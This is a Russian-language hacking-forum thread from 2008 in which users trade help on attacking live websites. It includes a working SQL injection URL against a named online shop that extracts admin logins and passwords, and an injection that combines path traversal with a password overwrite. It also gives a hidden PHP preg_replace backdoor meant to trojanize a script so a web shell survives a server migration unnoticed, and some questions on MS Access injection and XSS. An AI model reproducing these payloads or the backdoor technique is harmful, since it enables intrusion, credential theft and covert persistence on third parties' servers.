ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.08.2008, 03:24
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
ну так правильно... тебе ж в прошлом посту написали что там 17 столбцов=)
http://www.nailshop.ee/emall/detail.php?prodid=1+and+1=2+union+select+1,2,3,con cat_ws(0x3a,login,password),5,6,7,8,9,0,1,2,3,4,5, 6,7+from+admin+limit+0,1/*
Последний раз редактировалось gisTy; 27.08.2008 в 03:30..
|
|
|
27.08.2008, 14:05
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
Провел на форуме:
29295
Репутация:
4
|
|
Сообщение от gisTy
ну так правильно... тебе ж в прошлом посту написали что там 17 столбцов=)
не, с тем сайтом (nailshop.ee) я разобрался уже, спасибо. А тут уже другой сайт (datagate.ee) и случай вроде совсем не похожий, подскажите как с ним быть
Последний раз редактировалось zjuk@; 27.08.2008 в 14:08..
|
|
|
|
27.08.2008, 17:22
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606
Репутация:
105
|
|
проблемка с инъекцией:
описание:
нету выводимых полей (это не проблема)
к тому же локальный "инклуд" средствами copy(), по запрсу видно, что ОС винда
проблема заключается в объединение запросов sql, можно ли объеденить с запросом INTO OUTFILE ?
Код:
gallery.php?speichern=../../../../../../../../../../../../boot.ini', user_password='d41d8cd98f00b204e9800998ecf8427e' WHERE user_id=84 +--+
|
|
|
|
27.08.2008, 19:07
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от zjuk@
не, с тем сайтом (nailshop.ee) я разобрался уже, спасибо. А тут уже другой сайт (datagate.ee) и случай вроде совсем не похожий, подскажите как с ним быть
Ну там возможно просто два запроса что лишает возможности провести инъекцию с выводом данных, но никто не мешает раскрутить её посимвольно:
Код:
version(): PostgreSQL 8.2.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 (Gentoo 4.1.1-r3)
current_database(): portal
Кстати т.к. это ПостгриСКЛ, то синтаксис чуть чуть отличается, так что может тебе и удастся раскрутить её не как слепую.
Смотри статьи:
https://forum.antichat.ru/showthread.php?t=35599 - здесь немного рассказано про инъекции в скриптах, использующих PostgreSQL.
https://forum.antichat.ru/thread19844.html - а здесь рассказано про работу со слепыми инъекциями.
Последний раз редактировалось Grey; 27.08.2008 в 21:28..
|
|
|
|
27.08.2008, 23:13
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633
Репутация:
3
|
|
Здравствуйте! 
Подскажите, пожалуйста:
в скором времени с сервера, на котором сейчас стоит шелл, все файлы будут переносить на новый сервер, и, вероятно, мой шелл найдут.
Пока есть возможность, хочется незаметно добавить в php-файл акой-нибудь, свой код, чтобы через него можно было залить шелл на новом сервере.
Подскажите, какой код можно добавить в существующий php-файл не очень большого размера (строк 100), чтобы это было как можно меньше заметно разработчикам?
функция system - отключена
Спасибо! |
|
|
|
27.08.2008, 23:26
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от fervex
Здравствуйте!
Подскажите, пожалуйста:
в скором времени с сервера, на котором сейчас стоит шелл, все файлы будут переносить на новый сервер, и, вероятно, мой шелл найдут.
Пока есть возможность, хочется незаметно добавить в php-файл акой-нибудь, свой код, чтобы через него можно было залить шелл на новом сервере.
Подскажите, какой код можно добавить в существующий php-файл не очень большого размера (строк 100), чтобы это было как можно меньше заметно разработчикам?
функция system - отключена
Спасибо!
PHP код:
if(isset($_GET['act']) and iseet($_GET['id4'])) preg_replace("/55/e",$_GET['act'],$_GET['id4']);
И обращайся к серву так:
Код:
script.php?id4=55&act=phpinfo();
script.php?id4=55&act=[PHPCODE]
Сможешь выполнять php код.
Помоему это достаточно компактный и безпалевный вариант троянизации скриптов.
Последний раз редактировалось Grey; 27.08.2008 в 23:30..
|
|
|
|
28.08.2008, 00:19
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
>>Помоему это достаточно компактный и безпалевный вариант троянизации скриптов.
Лучше уж тогда $_REQUEST["act"], post или cookie по безпалевней будут. Хотя вариантов море впринципе.
|
|
|
|
28.08.2008, 00:33
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
БД MS ACCESS
Код:
site.com/Def.asp?id=222+1,2,mail,4,5+from+costumers
возникла такая проблема знаю имя табцицы и имя нужной колонки каким образом можно вывести инфу ? лимита там нет можно чем нибудь заменить ? where тоже воспользоваться не получаеться ((
заранее спасибо
Последний раз редактировалось MaSTeR GэN; 28.08.2008 в 12:52..
|
|
|
|
28.08.2008, 10:13
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
Сообщение от fervex
Здравствуйте!
Подскажите, пожалуйста:
в скором времени с сервера, на котором сейчас стоит шелл, все файлы будут переносить на новый сервер, и, вероятно, мой шелл найдут.
Пока есть возможность, хочется незаметно добавить в php-файл акой-нибудь, свой код, чтобы через него можно было залить шелл на новом сервере.
Подскажите, какой код можно добавить в существующий php-файл не очень большого размера (строк 100), чтобы это было как можно меньше заметно разработчикам?
функция system - отключена
Спасибо! https://forum.antichat.ru/showthread.php?t=33690
|
|
|
|
28.08.2008, 18:45
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903
Репутация:
238
|
|
Здраствуйте,у меня вот возникла такая проблема,я вот нашел уязвимость на сайте,я могу через ссылку в страницу запихнуть любой код, и html и javascript,все что вожу,все отображается на странице,вот только одно то что php никаким образом там не идет,я какой скрипт в страницу не запыхиваю,то сервер его не обрабатывает,а в исходном коде страницы виден всесь скрипт,и есче там фильтр перед ' и " ставит \ как можно залить шелл на етот сайт,есле пхп код когда оказывается в странице не работает....кста,а просто пхп там работает,там весь сайт построин из пхп страниц,и есче,там сервер у них стоит LiteSpeed Web Server может кто подскажит что делать дальше???
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
